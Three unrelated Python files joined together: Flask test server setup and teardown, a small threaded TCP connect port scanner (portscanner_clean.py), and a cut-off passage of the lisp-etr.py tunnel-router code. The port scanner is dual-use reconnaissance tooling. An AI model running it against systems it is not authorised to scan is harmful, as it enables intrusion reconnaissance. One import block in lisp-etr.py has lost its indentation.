    def root():
        # Echo the raw request body to stdout for the test log.
        print('Got data: ' + request.data);
        return 'hello!!!'

    @app.route("/data")
    def get_data():
        # /data?size=N returns N bytes of 'a'.
        size = int(request.args['size'])
        return 'a'*size

    def flaskThread():
        app.run(host='0.0.0.0', port=8088)

    # Run the server in a background thread so the test can proceed.
    th = Thread(target=flaskThread)
    th.start()
@teardown('HTTP GET & POST requests')
def teardown_http_get(e):
    """Stop the Flask HTTP server via its /shutdown endpoint."""
    response = urllib2.urlopen('http://localhost:8088/shutdown')
    html = response.read()
    # Fixed 30 s pause; presumably lets the port leave TIME_WAIT before
    # the next test re-binds 8088 -- TODO confirm.
    time.sleep(30)
@setup('HTTPS GET request')
def setup_http_get(e):
    """Start a local HTTPS Flask app on port 8088 for the HTTPS GET test.

    NOTE(review): this function reuses the name of the HTTP setup above;
    presumably the @setup decorator registers each function when the module
    is imported, so the rebinding is harmless -- verify mock_decorators.
    """
    app = Flask(__name__)

    def shutdown_server():
        # Werkzeug-specific shutdown hook.
        func = request.environ.get('werkzeug.server.shutdown')
        if func is None:
            raise RuntimeError('Not running with the Werkzeug Server')
        func()

    @app.route('/shutdown')
    def shutdown():
        shutdown_server()
        return 'Server shutting down...'

    @app.route("/")
    def root():
        return 'hello!!!'

    @app.route("/data")
    def get_data():
        # /data?size=N returns N bytes of 'a'.
        size = int(request.args['size'])
        return 'a'*size

    def flaskThread():
        # Serve TLS with the certificate/key files next to this script.
        p = os.path.dirname(os.path.abspath(__file__))
        context = (p + '/server.crt', p + '/server.key')
        print(context)
        app.run(host='0.0.0.0', port=8088, ssl_context=context)

    th = Thread(target=flaskThread)
    th.start()
@teardown('HTTPS GET request')
def teardown_http_get(e):
    """Stop the HTTPS Flask server via /shutdown, skipping cert validation."""
    # The server uses a self-signed certificate, so disable verification
    # for this local shutdown request only.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    p = os.path.dirname(os.path.abspath(__file__))
    response = urllib2.urlopen('https://localhost:8088/shutdown', context=ctx)
    html = response.read()
|
portscanner_clean.py | # ! Requires python 3.6 and up
from socket import * #Imports everything from socket library
from threading import * #Imports everything from threading library
import argparse as argp #Import argparse as argp for arguement parsing
from termcolor import colored as clrd #Import color text to the output, not neccessary but helps easily seeing the data
def connScan(tgtHost, tgtPort):  # Note: Does the port scanning
    """Attempt a TCP connect to tgtHost:tgtPort and print open/closed."""
    # Create the socket before the try block: in the original, a failure
    # inside socket() left 'sock' unbound and the finally clause raised
    # NameError. Also narrow the bare except to OSError (connect errors).
    sock = socket(AF_INET, SOCK_STREAM)
    try:
        sock.connect((tgtHost, tgtPort))
        print(clrd(f"[+] Port {tgtPort} for tcp is Open", 'green'))
    except OSError:
        print(clrd(f"[-] Port {tgtPort} for tcp is Closed", 'red'))
    finally:
        sock.close()
def portScan(tgtHost, tgtPorts):  # Note: Does the Parsing and Threading if multiple ports
    """Resolve tgtHost and scan every port in tgtPorts, one thread per port."""
    try:
        tgtIP = gethostbyname(tgtHost)
    except OSError:
        # Fixed: the original printed and fell through with tgtIP unbound,
        # raising NameError on the next line. Bail out instead.
        print(f"Unknown Host {tgtHost} ")
        return
    try:
        # Reverse-resolve for a friendlier banner; fall back to the IP.
        tgtName = gethostbyaddr(tgtIP)
        print(f"Scan Results for: {tgtName[0]}")
    except OSError:
        print(f"Scan Results for: {tgtIP}")
    setdefaulttimeout(1)
    for tgtPort in tgtPorts:
        t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
        t.start()
def main():
    """Parse the -H/-p options and kick off the scan."""
    parser = argp.ArgumentParser(description="Usage of program: " + "-H <target host> -p <target port>")
    parser.add_argument("-H", "--Host", dest="tgtHost", metavar="", required=True, help="Specify Target Host.")
    parser.add_argument("-p", "--Port", dest="tgtPort", metavar="", required=True, help="Specify Target Port for multiple ports separate by comma.")
    options = parser.parse_args()
    tgtHost = options.tgtHost
    tgtPorts = str(options.tgtPort).split(",")
    # Defensive check only -- argparse already enforces required=True.
    # Fixed: use boolean 'or' and 'is None' instead of bitwise '|' on
    # comparison results.
    if tgtHost is None or tgtPorts[0] is None:
        print(clrd(parser.usage, 'cyan'))
        # Note: Outputs "Usage of program: -H <target host> -p <target port>" if no parameters attached
        exit(0)
    portScan(tgtHost, tgtPorts)
if __name__ == "__main__":
    # Script entry point.
    main()
|
lisp-etr.py | #-----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import select
import threading
import time
import pcappy
import struct
import commands
import os
try:
import pytun
except:
pytun = None
#endtry
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-etr process.
#
lisp_register_timer = None
lisp_trigger_register_timer = None
lisp_etr_info_timer = None
lisp_ephem_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_ipc_listen_socket = None
lisp_send_sockets = [None, None, None]
lisp_raw_socket = None
lisp_l2_socket = None
lisp_mac_header = None
LISP_MAP_REGISTER_INTERVAL = 60 # In units of seconds
#------------------------------------------------------------------------------
#
# lisp_etr_database_mapping_command
#
# This function supports adding additional RLOCs to a database-mapping entry
# that already exists.
#
def lisp_etr_database_mapping_command(kv_pair):
    """Process a "lisp database-mapping" command clause.

    kv_pair: keyword/value pairs parsed from the configuration clause.
    Delegates storage to lispconfig, then (unless NAT-traversal is on)
    schedules a triggered Map-Register to the configured map-servers.
    """
    global lisp_trigger_register_timer
    global lisp_send_sockets

    lispconfig.lisp_database_mapping_command(kv_pair, lisp_ephem_port)

    #
    # Trigger Map-Register when all database-mappings are configured.
    #
    # Do not trigger Map-Register if NAT-traversal is configured. We may not
    # have the global RLOC yet from Info-Replies. When the Info-Reply comes
    # in we do trigger Map-Registers to all map-servers.
    #
    if (lisp.lisp_nat_traversal): return
    # Don't stack a second trigger while one is already pending.
    if (lisp_trigger_register_timer != None and
        lisp_trigger_register_timer.is_alive()): return

    if (len(lisp.lisp_map_servers_list) > 0):
        lisp_trigger_register_timer = threading.Timer(5,
            lisp_process_register_timer, [lisp_send_sockets])
        lisp_trigger_register_timer.start()
    #endif
#enddef
#
# lisp_etr_show_command
#
# Show ETR configured map-servers and database-mappings.
#
def lisp_etr_show_command(clause):
    """Build and return the HTML status page for the LISP ETR.

    Shows local RLOCs, decap stats, configured map-servers,
    database-mappings, and optional ELP/RLE/JSON/group-mapping tables.
    """
    #
    # Show local found RLOCs.
    #
    output = lispconfig.lisp_show_myrlocs("")

    #
    # Show decapsulation stats.
    #
    output = lispconfig.lisp_show_decap_stats(output, "ETR")

    #
    # Show configured map-servers.
    #
    dns_suffix = lisp.lisp_decent_dns_suffix
    if (dns_suffix == None):
        dns_suffix = ":"
    else:
        dns_suffix = " (dns-suffix '{}'):".format(dns_suffix)
    #endif

    hover = "{} configured map-servers".format(len(lisp.lisp_map_servers_list))
    title = "LISP-ETR Configured Map-Servers{}".format(dns_suffix)
    title = lisp.lisp_span(title, hover)

    hover = ("P = proxy-reply requested, M = merge-registrations " + \
        "requested, N = Map-Notify requested")
    reg_title = lisp.lisp_span("Registration<br>flags", hover)

    output += lispconfig.lisp_table_header(title, "Address", "Auth-Type",
        "xTR-ID", "Site-ID", reg_title, "Map-Registers<br>Sent",
        "Map-Notifies<br>Received")

    for ms in lisp.lisp_map_servers_list.values():
        ms.resolve_dns_name()
        # An ms-name of "all" is the default and is not displayed.
        ms_name = "" if ms.ms_name == "all" else ms.ms_name + "<br>"
        addr_str = ms_name + ms.map_server.print_address_no_iid()
        if (ms.dns_name): addr_str += "<br>" + ms.dns_name
        xtr_id = "0x" + lisp.lisp_hex_string(ms.xtr_id)
        # Upper-case letter means the flag is set; lower-case means clear.
        flags = "{}-{}-{}-{}".format("P" if ms.proxy_reply else "p",
            "M" if ms.merge_registrations else "m",
            "N" if ms.want_map_notify else "n",
            "R" if ms.refresh_registrations else "r")
        registers_sent = ms.map_registers_sent + \
            ms.map_registers_multicast_sent
        output += lispconfig.lisp_table_row(addr_str,
            "sha1" if (ms.alg_id == lisp.LISP_SHA_1_96_ALG_ID) else "sha2",
            xtr_id, ms.site_id, flags, registers_sent,
            ms.map_notifies_received)
    #endfor
    output += lispconfig.lisp_table_footer()

    #
    # Show database-mappings configured.
    #
    output = lispconfig.lisp_show_db_list("ETR", output)

    #
    # Show ELP configuration, if it exists.
    #
    if (len(lisp.lisp_elp_list) != 0):
        output = lispconfig.lisp_show_elp_list(output)
    #endif

    #
    # Show RLE configuration, if it exists.
    #
    if (len(lisp.lisp_rle_list) != 0):
        output = lispconfig.lisp_show_rle_list(output)
    #endif

    #
    # Show JSON configuration, if it exists.
    #
    if (len(lisp.lisp_json_list) != 0):
        output = lispconfig.lisp_show_json_list(output)
    #endif

    #
    # Show group-mappings, if they exist.
    #
    if (len(lisp.lisp_group_mapping_list) != 0):
        title = "Configured Group Mappings:"
        output += lispconfig.lisp_table_header(title, "Name", "Group Prefix",
            "Sources", "Use MS")
        for gm in lisp.lisp_group_mapping_list.values():
            sources = ""
            for s in gm.sources: sources += s + ", "
            if (sources == ""):
                sources = "*"
            else:
                sources = sources[0:-2]
            #endif
            output += lispconfig.lisp_table_row(gm.group_name,
                gm.group_prefix.print_prefix(), sources, gm.use_ms_name)
        #endfor
        output += lispconfig.lisp_table_footer()
    #endif
    return(output)
#enddef
#
# lisp_etr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_etr_show_keys_command(parameter):
    """Show the ETR crypto-key list via lispconfig.lisp_show_crypto_list()."""
    output = lispconfig.lisp_show_crypto_list("ETR")
    return(output)
#enddef
#
# lisp_map_server_command
#
# Store configured map-servers.
#
def lisp_map_server_command(kv_pairs):
    """Process a "lisp map-server" command clause and store the map-server.

    Also triggers an Info-Request (first map-server with NAT-traversal) or
    a Map-Register (subsequent map-servers), and starts the periodic
    register timer if database-mappings were configured first.

    NOTE(review): written for Python 2 -- auth_key.keys()[0] and
    ekey.keys()[0] would raise TypeError on Python 3 dict views.
    """
    global lisp_trigger_register_timer
    global lisp_etr_info_timer

    addresses = []
    dns_names = []
    key_id = 0
    alg_id = 0
    password = ""
    proxy_reply = False
    merge = False
    refresh = False
    want = False
    site_id = 0
    ms_name = None
    ekey_id = 0
    ekey = None

    # Walk the parsed keyword/value pairs and collect settings.
    for kw in kv_pairs.keys():
        value = kv_pairs[kw]
        if (kw == "ms-name"):
            ms_name = value[0]
        #endif
        if (kw == "address"):
            for i in range(len(value)):
                addresses.append(value[i])
            #endfor
        #endif
        if (kw == "dns-name"):
            for i in range(len(value)):
                dns_names.append(value[i])
            #endfor
        #endif
        if (kw == "authentication-type"):
            alg_id = lisp.LISP_SHA_1_96_ALG_ID if (value == "sha1") else \
                lisp.LISP_SHA_256_128_ALG_ID if (value == "sha2") else ""
        #endif
        if (kw == "authentication-key"):
            # Default to sha2 when no authentication-type was given.
            if (alg_id == 0): alg_id = lisp.LISP_SHA_256_128_ALG_ID
            auth_key = lisp.lisp_parse_auth_key(value)
            key_id = auth_key.keys()[0]
            password = auth_key[key_id]
        #endif
        if (kw == "proxy-reply"):
            proxy_reply = True if value == "yes" else False
        #endif
        if (kw == "merge-registrations"):
            merge = True if value == "yes" else False
        #endif
        if (kw == "refresh-registrations"):
            refresh = True if value == "yes" else False
        #endif
        if (kw == "want-map-notify"):
            want = True if value == "yes" else False
        #endif
        if (kw == "site-id"):
            site_id = int(value)
        #endif
        if (kw == "encryption-key"):
            ekey = lisp.lisp_parse_auth_key(value)
            ekey_id = ekey.keys()[0]
            ekey = ekey[ekey_id]
        #endif
    #endfor

    #
    # Store internal data structure.
    #
    ms = None
    for addr_str in addresses:
        if (addr_str == ""): continue
        ms = lisp.lisp_ms(addr_str, None, ms_name, alg_id, key_id, password,
            proxy_reply, merge, refresh, want, site_id, ekey_id, ekey)
    #endfor
    for name in dns_names:
        if (name == ""): continue
        ms = lisp.lisp_ms(None, name, ms_name, alg_id, key_id, password,
            proxy_reply, merge, refresh, want, site_id, ekey_id, ekey)
    #endfor

    #
    # Trigger a Info-Request if we are doing NAT-traversal if this is the
    # first Map-Server..
    #
    first_ms = (len(lisp.lisp_map_servers_list) == 1)
    if (first_ms):
        ms = lisp.lisp_map_servers_list.values()[0]
        lisp_etr_info_timer = threading.Timer(2, lisp_etr_process_info_timer,
            [ms.map_server])
        lisp_etr_info_timer.start()
    else:
        #
        # Trigger Map-Register to newly configured Map-Server.
        #
        # Do not trigger Map-Register if NAT-traversal is configured. We may
        # not have the global RLOC yet from Info-Replies. When the Info-Reply
        # comes in we do trigger Map-Registers to all map-servers.
        #
        if (lisp.lisp_nat_traversal): return
        if (ms and len(lisp.lisp_db_list) > 0):
            lisp_build_map_register(lisp_send_sockets, None, None, ms, False)
        #endif
    #endif

    #
    # Handle case where "lisp database-mapping" comes before "lisp map-server"
    # in configuration file. We have to start periodic timer.
    #
    if (len(lisp.lisp_db_list) > 0):
        if (lisp_trigger_register_timer != None and
            lisp_trigger_register_timer.is_alive()): return

        lisp_trigger_register_timer = threading.Timer(5,
            lisp_process_register_timer, [lisp_send_sockets])
        lisp_trigger_register_timer.start()
    #endif
    return
#enddef
#
# lisp_group_mapping_command
#
# Process the "lisp group-mapping" command clause.
#
def lisp_group_mapping_command(kv_pairs):
    """Process a "lisp group-mapping" command clause and add the group.

    NOTE(review): group_name is only bound when a "group-name" pair is
    present; a clause without one would raise NameError at the
    lisp_group_mapping() call -- presumably the config parser guarantees
    it. Confirm against lispconfig.
    """
    sources = []
    group_prefix = None
    rle_address = None
    ms_name = "all"

    for kw in kv_pairs.keys():
        value = kv_pairs[kw]
        if (kw == "group-name"):
            group_name = value
        #endif
        if (kw == "group-prefix"):
            # Lazily allocate the address so instance-id can come first.
            if (group_prefix == None):
                group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
            #endif
            group_prefix.store_prefix(value)
        #endif
        if (kw == "instance-id"):
            if (group_prefix == None):
                group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
            #endif
            group_prefix.instance_id = int(value)
        #endif
        if (kw == "ms-name"):
            ms_name = value[0]
        #endif
        if (kw == "address"):
            for source in value:
                if (source != ""): sources.append(source)
            #endfor
        #endif
        if (kw == "rle-address"):
            if (rle_address == None):
                rle_address = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
            #endif
            rle_address.store_address(value)
        #endif
    #endfor

    gm = lisp.lisp_group_mapping(group_name, ms_name, group_prefix, sources,
        rle_address)
    gm.add_group()
    return
#enddef
#
# lisp_build_map_register_records
#
# Build EID and RLOC records to be inserted in a Map-Register message.
#
def lisp_build_map_register_records(quiet, db, eid, group, ttl):
    """Build EID and RLOC records for a Map-Register message.

    quiet: suppress per-record debug logging when True.
    db:    the database-mapping entry supplying the RLOC-set.
    eid/group: the EID (and multicast group) being registered.
    ttl:   record TTL to advertise.
    Returns (encoded_records, record_count).
    """
    #
    # Don't include RTR-list if there is no NAT in the path but nat-traversal
    # is configured and NAT in path is tested. When there is a NAT, include
    # all RTRs if lisp_register_all_rtrs is configured. Otherwise, if the
    # array element is None, then the RTR is down and should be excluded in
    # the list to register.
    #
    rtr_list = {}
    for rloc_entry in db.rloc_set:
        if (rloc_entry.translated_rloc.is_null()): continue

        for rtr_str in lisp.lisp_rtr_list:
            rtr = lisp.lisp_rtr_list[rtr_str]
            if (lisp.lisp_register_all_rtrs == False and rtr == None):
                lisp.lprint(" Exclude unreachable RTR {}".format( \
                    lisp.red(rtr_str, False)))
                continue
            #endif
            if (rtr == None): continue
            rtr_list[rtr_str] = rtr
        #endfor
        # One translated RLOC is enough to collect the RTR set.
        break
    #endfor

    count = 0
    eid_records = ""
    # Emit one EID-record per instance-id the EID participates in.
    for iid in [eid.instance_id] + eid.iid_list:
        eid_record = lisp.lisp_eid_record()
        eid_record.rloc_count = len(db.rloc_set) + len(rtr_list)
        eid_record.authoritative = True
        eid_record.record_ttl = ttl
        eid_record.eid.copy_address(eid)
        eid_record.eid.instance_id = iid
        eid_record.eid.iid_list = []
        eid_record.group.copy_address(group)
        eid_records += eid_record.encode()
        if (not quiet):
            prefix_str = lisp.lisp_print_eid_tuple(eid, group)
            decent_index = ""
            if (lisp.lisp_decent_pull_xtr_configured()):
                decent_index = lisp.lisp_get_decent_index(eid)
                decent_index = lisp.bold(str(decent_index), False)
                decent_index = ", decent-index {}".format(decent_index)
            #endif
            lisp.lprint(" EID-prefix {} for ms-name '{}'{}".format( \
                lisp.green(prefix_str, False), db.use_ms_name, decent_index))
            eid_record.print_record(" ", False)
        #endif

        # Encode the configured RLOC-set.
        for rloc_entry in db.rloc_set:
            rloc_record = lisp.lisp_rloc_record()
            rloc_record.store_rloc_entry(rloc_entry)
            rloc_record.local_bit = rloc_entry.rloc.is_local()
            rloc_record.reach_bit = True
            eid_records += rloc_record.encode()
            if (not quiet): rloc_record.print_record(" ")
        #endfor

        #
        # If we are doing NAT-traversal, include a set or RTR RLOCs with
        # priority 1. And set the global RLOCs to priority 254.
        #
        for rtr in rtr_list.values():
            rloc_record = lisp.lisp_rloc_record()
            rloc_record.rloc.copy_address(rtr)
            rloc_record.priority = 254
            rloc_record.rloc_name = "RTR"
            rloc_record.weight = 0
            rloc_record.mpriority = 255
            rloc_record.mweight = 0
            rloc_record.local_bit = False
            rloc_record.reach_bit = True
            eid_records += rloc_record.encode()
            if (not quiet): rloc_record.print_record(" RTR ")
        #endfor

        #
        # Return to caller number of EID records written to returned buffer.
        #
        count += 1
    #endfor
    return(eid_records, count)
#enddef
#
# lisp_build_map_register
#
# From each configured "database-mapping" command, register mappings to
# configured map-servers.
#
def lisp_build_map_register(lisp_sockets, ttl, eid_only, ms_only, refresh):
    """Build and send Map-Register messages for database-mappings.

    lisp_sockets -- socket array used to send the Map-Registers.
    ttl          -- record TTL; None means use lisp.LISP_REGISTER_TTL.
    eid_only     -- when non-None, register only this single EID.
    ms_only      -- when non-None, register only with this map-server.
    refresh      -- value for the Map-Register refresh bit when the
                    map-server has refresh_registrations configured.
    """

    #
    # No database-mapping entries.
    #
    if (eid_only != None):
        db_list_len = 1
    else:
        db_list_len = lisp.lisp_db_list_length()
        if (db_list_len == 0): return
    #endif

    lisp.lprint("Build Map-Register for {} database-mapping entries". \
        format(db_list_len))

    #
    # Set boolean if "decentralized-pull-xtr-[modulus,dns-suffix]" configured.
    #
    decent = lisp.lisp_decent_pull_xtr_configured()

    #
    # Go quiet with debug output when there are a lot of EID-records.
    #
    quiet = (db_list_len > 12)

    ms_list = {}
    if (decent):
        #
        # If "decentralized-pull-xtr-[modulus,dns-suffix]" is configured,
        # decide which map-server this EID belongs too (and is registered
        # with.
        #
        for db in lisp.lisp_db_list:
            eid = db.eid if db.group.is_null() else db.group
            dns_name = lisp.lisp_get_decent_dns_name(eid)
            ms_list[dns_name] = []
        #endfor
    else:
        #
        # Set up each map-server names so we can decide which EID-prefixes
        # go to which map-servers. [0] is eid_records and [1] is count.
        #
        for ms in lisp.lisp_map_servers_list.values():
            if (ms_only != None and ms != ms_only): continue
            ms_list[ms.ms_name] = []
        #endfor
    #endif

    #
    # Create data structure instances to build Map-Register message.
    #
    map_register = lisp.lisp_map_register()
    map_register.nonce = 0xaabbccdddfdfdf00
    map_register.xtr_id_present = True
    if (ttl == None): ttl = lisp.LISP_REGISTER_TTL

    #
    # Traverse the database-mapping associative array.
    #
    for db in lisp.lisp_db_list:
        if (decent):
            ms_dns_name = lisp.lisp_get_decent_dns_name(db.eid)
        else:
            ms_dns_name = db.use_ms_name
        #endif

        #
        # Is db entry associated with a map-server name that is not
        # configured? ("in" replaces the Python2-only dict.has_key().)
        #
        if (ms_dns_name not in ms_list): continue

        msl = ms_list[ms_dns_name]
        if (msl == []):
            msl = ["", 0]
            ms_list[ms_dns_name].append(msl)
        else:
            msl = ms_list[ms_dns_name][-1]
        #endif

        #
        # If dynamic-EIDs are discovered, add each of them to EID-records,
        # unless, we are doing a trigger in which case a single dynamic-EID
        # is built into an EID-record.
        #
        # Otherwise, add static EID-prefixes into EID-records, unless a
        # single one is triggered.
        #
        eid_records = ""
        if (db.dynamic_eid_configured()):
            for dyn_eid in db.dynamic_eids.values():
                eid = dyn_eid.dynamic_eid
                if (eid_only == None or eid_only.is_exact_match(eid)):
                    records, count = lisp_build_map_register_records(quiet,
                        db, eid, db.group, ttl)
                    eid_records += records
                    msl[1] += count
                #endif
            #endfor
        else:
            if (eid_only == None):
                eid_records, count = lisp_build_map_register_records(quiet,
                    db, db.eid, db.group, ttl)
                msl[1] += count
            #endif
        #endif

        #
        # Add EID-records to correct map-server name set. Start a new chunk
        # once the current one holds 20 records or exceeds ~1100 bytes,
        # presumably to keep each Map-Register under typical MTU size.
        #
        msl[0] += eid_records
        if (msl[1] == 20 or len(msl[0]) > 1100):
            msl = ["", 0]
            ms_list[ms_dns_name].append(msl)
        #endif
    #endfor

    #
    # Send Map-Register to each configured map-server.
    #
    for ms in lisp.lisp_map_servers_list.values():
        if (ms_only != None and ms != ms_only): continue

        ms_dns_name = ms.dns_name if decent else ms.ms_name
        if (ms_dns_name not in ms_list): continue

        for msl in ms_list[ms_dns_name]:

            #
            # Build map-server specific fields.
            #
            map_register.record_count = msl[1]
            if (map_register.record_count == 0): continue

            map_register.nonce += 1
            map_register.alg_id = ms.alg_id
            map_register.key_id = ms.key_id
            map_register.proxy_reply_requested = ms.proxy_reply
            map_register.merge_register_requested = ms.merge_registrations
            map_register.map_notify_requested = ms.want_map_notify
            map_register.xtr_id = ms.xtr_id
            map_register.site_id = ms.site_id
            map_register.encrypt_bit = (ms.ekey != None)
            if (ms.refresh_registrations):
                map_register.map_register_refresh = refresh
            #endif
            if (ms.ekey != None): map_register.encryption_key_id = ms.ekey_id

            packet = map_register.encode()
            map_register.print_map_register()

            #
            # Append EID-records and encode xtr-ID and site-ID at end of
            # Map-Register.
            #
            trailer = map_register.encode_xtr_id("")
            eid_records = msl[0]
            packet = packet + eid_records + trailer

            ms.map_registers_sent += 1
            lisp.lisp_send_map_register(lisp_sockets, packet, map_register,
                ms)

            # Pace back-to-back transmissions slightly.
            time.sleep(.001)
        #endfor

        #
        # Do DNS lookup for Map-Server if "dns-name" configured.
        #
        ms.resolve_dns_name()

        #
        # Exit loop if we are triggering a Map-Register to a single
        # Map-Server.
        #
        if (ms_only != None and ms == ms_only): break
    #endfor
    return
#enddef
#
# lisp_etr_process_info_timer
#
# Periodic Info-Request timer. This must fire more often than the periodic
# Map-Register timer and more often than the NAT timeout (usually one
# minute) so NAT state stays open.
#
def lisp_etr_process_info_timer(ms):
    global lisp_etr_info_timer
    global lisp_ephem_socket

    lisp.lisp_set_exception()

    #
    # Send Info-Requests when database-mappings contain private RLOCs.
    #
    socket_list = [lisp_ephem_socket, lisp_ephem_socket,
        lisp_ipc_listen_socket]
    lisp.lisp_build_info_requests(socket_list, ms, lisp.LISP_CTRL_PORT)

    #
    # Also send Info-Requests to each RTR so the NAT opens state that lets
    # RTRs encapsulate to this ETR when it sits behind a NAT.
    #
    skip_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
    for rtr in lisp.lisp_rtr_list.values():
        if (rtr == None): continue

        if (skip_private and rtr.is_private_address()):
            r = lisp.red(rtr.print_address_no_iid(), False)
            lisp.lprint("Skip over RTR private address {}".format(r))
            continue
        #endif
        lisp.lisp_build_info_requests(socket_list, rtr, lisp.LISP_DATA_PORT)
    #endfor

    #
    # Rearm the periodic timer. For some reason only this timer has to be
    # explicitly canceled first (found testing NAT-traversal on a rasp-pi,
    # Jul 2015).
    #
    lisp_etr_info_timer.cancel()
    lisp_etr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL,
        lisp_etr_process_info_timer, [None])
    lisp_etr_info_timer.start()
    return
#enddef
#
# lisp_process_register_timer
#
# Periodic Map-Register timer handler.
#
def lisp_process_register_timer(lisp_sockets):
    global lisp_register_timer
    global lisp_ephem_socket

    lisp.lisp_set_exception()

    #
    # Register all database-mappings with the configured map-servers.
    #
    lisp_build_map_register(lisp_sockets, None, None, None, True)

    #
    # For L2-overlays, additionally register a join of the broadcast MAC
    # address.
    #
    if (lisp.lisp_l2_overlay):
        bcast_entry = [None, "ffff-ffff-ffff", True]
        lisp_send_multicast_map_register(lisp_sockets, [bcast_entry])
    #endif

    #
    # Rearm the periodic timer.
    #
    if (lisp_register_timer): lisp_register_timer.cancel()
    lisp_register_timer = threading.Timer(LISP_MAP_REGISTER_INTERVAL,
        lisp_process_register_timer, [lisp_send_sockets])
    lisp_register_timer.start()
    return
#enddef
#
# lisp_send_multicast_map_register
#
# Build a Map-Register message with a Multicast Info Type LCAF as an EID-record
# for each entry in the 'entries' array. And build an RLOC-record as an RLE
# describing this ETR as the RLOC to be used for replication.
#
# The entries is an array of (source, group, joinleave) tuples.
#
def lisp_send_multicast_map_register(lisp_sockets, entries):
    """Register multicast (S,G) state with the configured map-servers.

    lisp_sockets -- socket array used to send the Map-Registers.
    entries      -- array of (source, group, joinleave) tuples; joinleave
                    True means join (TTL LISP_REGISTER_TTL), False means
                    leave (TTL 0).
    """
    length = len(entries)
    if (length == 0): return

    #
    # Determine the group address-family from the first entry.
    #
    afi = None
    if (entries[0][1].find(":") != -1): afi = lisp.LISP_AFI_IPV6
    if (entries[0][1].find(".") != -1): afi = lisp.LISP_AFI_IPV4
    if (entries[0][1].find("-") != -1): afi = lisp.LISP_AFI_MAC
    if (afi == None):
        lisp.lprint("lisp_send_multicast_map_register() invalid group address")
        return
    #endif

    #
    # Find all (*,G) entries in entries array and replace with (S,G) entries
    # from lisp_group_mapping_list. The comment to avoid the source check
    # is there so we can build a g_entry that can validate against group
    # mappings. Have to fix to allow different sources for the same G when
    # (S,G) is reported.
    #
    g_entries = []
    for source, group, joinleave in entries:
        # if (source != None): continue
        g_entries.append([group, joinleave])
    #endfor

    decent = lisp.lisp_decent_pull_xtr_configured()
    ms_list = {}
    entries = []
    for group, joinleave in g_entries:
        ms_gm = lisp.lisp_lookup_group(group)
        if (ms_gm == None):
            lisp.lprint("No group-mapping for {}, could be underlay group". \
                format(group))
            continue
        #endif

        lisp.lprint("Use group-mapping '{}' {} for group {}".format( \
            ms_gm.group_name, ms_gm.group_prefix.print_prefix(), group))

        iid = ms_gm.group_prefix.instance_id
        ms_name = ms_gm.use_ms_name
        rle = ms_gm.rle_address

        #
        # To obtain decent-index for a group address, just use group address
        # and no source as part of hash. Because an ITR does not know if
        # (*,G) or (S,G) is registered with the mapping system
        #
        key = ms_name
        if (decent):
            key = lisp.lisp_get_decent_dns_name_from_str(iid, group)
            ms_list[key] = ["", 0]
        #endif

        if (len(ms_gm.sources) == 0):
            entries.append(["0.0.0.0", group, iid, key, rle, joinleave])
            continue
        #endif

        for s in ms_gm.sources:
            ms_list[key] = ["", 0]
            entries.append([s, group, iid, key, rle, joinleave])
        #endfor
    #endfor

    length = len(entries)
    if (length == 0): return

    lisp.lprint("Build Map-Register for {} multicast entries".format(length))

    #
    # Build RLE node for RLOC-record encoding. If behind a NAT, we need to
    # insert a global address as the RLE node address. We will do that in
    # the entries for loop.
    #
    rle_node = lisp.lisp_rle_node()
    rle_node.level = 128
    translated_rloc = lisp.lisp_get_any_translated_rloc()
    rle = lisp.lisp_rle("")
    rle.rle_nodes.append(rle_node)

    #
    # Set up each map-server names so we can decide which EID-prefixes go
    # to which map-servers. [0] is eid_records and [1] is count. The ms_list
    # is already setup for when pull-based decent is used.
    #
    if (decent == False):
        for ms in lisp.lisp_map_servers_list.values():
            ms_list[ms.ms_name] = ["", 0]
        #endfor
    #endif

    rloc_name = None
    if (lisp.lisp_nat_traversal): rloc_name = lisp.lisp_hostname

    #
    # Count number of RTRs reachable so we know allocation count.
    #
    rtr_count = 0
    for rtr in lisp.lisp_rtr_list.values():
        if (rtr == None): continue
        rtr_count += 1
    #endfor

    #
    # Run through multicast entry array.
    #
    eid_records = ""
    for source, group, iid, ms_dns_name, rle_addr, joinleave in entries:
        #
        # Is db entry associated with a map-server name that is not
        # configured? ("in" replaces the Python2-only dict.has_key().)
        #
        if (ms_dns_name not in ms_list): continue

        eid_record = lisp.lisp_eid_record()
        eid_record.rloc_count = 1 + rtr_count
        eid_record.authoritative = True
        eid_record.record_ttl = lisp.LISP_REGISTER_TTL if joinleave else 0
        eid_record.eid = lisp.lisp_address(afi, source, 0, iid)
        if (eid_record.eid.address == 0): eid_record.eid.mask_len = 0
        eid_record.group = lisp.lisp_address(afi, group, 0, iid)
        if (eid_record.group.is_mac_broadcast() and \
            eid_record.eid.address == 0): eid_record.eid.mask_len = 0

        decent_index = ""
        ms_name = ""
        if (lisp.lisp_decent_pull_xtr_configured()):
            decent_index = lisp.lisp_get_decent_index(eid_record.group)
            decent_index = lisp.bold(str(decent_index), False)
            decent_index = "with decent-index {}".format(decent_index)
        else:
            decent_index = "for ms-name '{}'".format(ms_dns_name)
        #endif

        eid_str = lisp.green(eid_record.print_eid_tuple(), False)
        lisp.lprint(" EID-prefix {} {}{}".format(eid_str, ms_name,
            decent_index))

        eid_records += eid_record.encode()
        eid_record.print_record(" ", False)
        ms_list[ms_dns_name][1] += 1

        #
